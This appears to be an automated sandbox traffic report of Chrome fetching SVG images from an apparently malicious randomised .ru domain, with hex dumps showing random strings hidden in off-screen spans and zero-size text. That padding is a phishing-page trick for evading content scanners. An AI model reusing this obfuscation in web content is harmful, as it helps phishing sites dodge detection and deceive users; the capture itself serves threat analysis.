                                                                                                                                                                                    2024-01-26 13:42:23 UTC1369INData Raw: 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 67 69 65 61 79 4d 67 44 61 56 31 37 62 36 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 38 69 39 41 6d 61 36 54 45 5a 5a 45 55 74 3c 2f 73 70 61 6e 3e 6c 79 20 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 61 78 74 49 7a 59 63 6c 45 49 79 6c 77 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d
                                                                                                                                                                                    Data Ascii: an>r<span style="position: absolute;left: -9999px;">gieayMgDaV17b6</span>i<span style="position: absolute;left: -9999px;">8i9Ama6TEZZEUt</span>ly l<span style="position: absolute;left: -9999px;">axtIzYclEIylw</span>o<span style="position: absolute;left: -


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    78192.168.2.1649832104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:24 UTC772OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6e8shUBSyBsuzja/3yrFiatHkI5jfZY2 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:24 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:24 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oCMUTaixSn9xI%2FHP75xq%2Bp%2Bz%2FqD4OfWOQevq8UfJWRU5FFsEbjH73BvavlmfyLlix2BKEZBg0kogkdxTQHsrP9lTzt0ePU3YD2y1WSq4j0XemMJ8fmDkWV%2BxkiBQbQPavWqkqGDWbJnsaPtpbdemNEsosR0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dd1f869674b-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:24 UTC645INData Raw: 34 30 65 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 64 36 35 6b 48 4e 6a 54 61 69 36 66 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e
                                                                                                                                                                                    Data Ascii: 40e<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">d65kHNjTai6f</span><span style="display: inlin
                                                                                                                                                                                    2024-01-26 13:42:24 UTC400INData Raw: 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22 2f
                                                                                                                                                                                    Data Ascii: 1.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/
                                                                                                                                                                                    2024-01-26 13:42:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    79192.168.2.1649834104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:24 UTC771OUTGET /VyRsmGftiIlOxrabXBIOtQtS/60DNPihs9uJ6rEVU/2qVT4IAbiSHSjf HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:25 UTC724INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:25 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OlB2UTFkFl8ajWbBwf7E9mdTOoeZxgwltTw%2FdWRMc%2Fk%2BKr4XW2y8esdw%2BPj%2BO4UOag1D2NbDP4ZHpdI2eYwyW8RdbVftBtur5kreqptjEfRWFJ6zYhZ2EnrbMy9EOai6QKn3H31AshcdIwTquWu9d7fpU4U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dd648754571-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:25 UTC645INData Raw: 31 38 31 36 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 32 78 63 31 43 47 4f 43 48 76 47 72 55 45 39 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73
                                                                                                                                                                                    Data Ascii: 1816<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">2xc1CGOCHvGrUE9</text><g opacity=".2" clip-path="url(#E)"><text s
                                                                                                                                                                                    2024-01-26 13:42:25 UTC1369INData Raw: 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 43 4d 65 4f 6f 55 6e 76 6a 32 55 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31
                                                                                                                                                                                    Data Ascii: /><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">CMeOoUnvj2U</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1
                                                                                                                                                                                    2024-01-26 13:42:25 UTC1369INData Raw: 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4c 4f 46 30 4b 67 6e 56 66 37 4a 74 4f 45 3c 2f 74 65 78 74 3e 3c 74 65 78
                                                                                                                                                                                    Data Ascii: ="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">LOF0KgnVf7JtOE</text><tex
                                                                                                                                                                                    2024-01-26 13:42:25 UTC1369INData Raw: 56 4d 30 33 44 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 53 5a 69 58 73 61 59 57 64 72 43 47 50 59 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35
                                                                                                                                                                                    Data Ascii: VM03D</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">SZiXsaYWdrCGPY</text></radialGradient><text style="display: inline; color: #1A7D75
                                                                                                                                                                                    2024-01-26 13:42:25 UTC1369INData Raw: 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 64 38 33 62 30 31 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 5a 43 55 43 74 78 45 34 4e 4e 6b 69 5a 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
                                                                                                                                                                                    Data Ascii: top stop-color="#d83b01" stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ZCUCtxE4NNkiZ</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline;
                                                                                                                                                                                    2024-01-26 13:42:25 UTC53INData Raw: 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 45 54 6e 6a 67 56 31 34 78 53 55 6f 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: 03px; font-size: 0.02px;">ETnjgV14xSUo</text></svg>
                                                                                                                                                                                    2024-01-26 13:42:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    80192.168.2.1649833104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:24 UTC761OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6UjhZnuFkmp/6aInfUMVk HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:25 UTC726INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:25 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xIs4GitNTFdKS3AY%2BYhM%2FRAckwwIG62VuJ8chdZDsC6k510203bTnoETMGEN4UdnuQ%2BDZBZ74uRapTIC2m5V6lBnKeNaaLIqGpm52PlD3QD%2BHUCmPyaltpHKqZh4Pad4SIDOn3%2FrgdiGc7vC9QAWlgvtc%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dd63f4cb08e-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:25 UTC643INData Raw: 39 39 64 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 33 64 34 76 56 71 71 47 44 4a 34 38 62 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69
                                                                                                                                                                                    Data Ascii: 99d<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">3d4vVqqGDJ48b</text><span style="display: inli
                                                                                                                                                                                    2024-01-26 13:42:25 UTC1369INData Raw: 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 65 4a 72 72 66 35 67 58 52 63 57 77 72 54 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31
                                                                                                                                                                                    Data Ascii: 6, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">eJrrf5gXRcWwrT</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.1
                                                                                                                                                                                    2024-01-26 13:42:25 UTC456INData Raw: 2c 32 2c 30 2c 30 2c 31 2d 2e 36 32 35 2d 2e 34 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68
                                                                                                                                                                                    Data Ascii: ,2,0,0,1-.625-.422,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-h
                                                                                                                                                                                    2024-01-26 13:42:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    81192.168.2.1649835172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:24 UTC460OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6e8shUBSyBsuzja/3yrFiatHkI5jfZY2 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:25 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:25 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=95Jog5tSXaocTcQIxpKFLWw49LTnjo8J95kvlhPtcMWg5UnKsD90L%2FYYRZx2WRDvIojGKkn1yXUj%2FGcPEKqvii%2F7a93ebFUguJfpl3tQ1OjYSpcdzCnvFzmEveYed47Ft66ozkDIIfswWbsK%2B1PCViDrI2g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92dd6a9746783-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
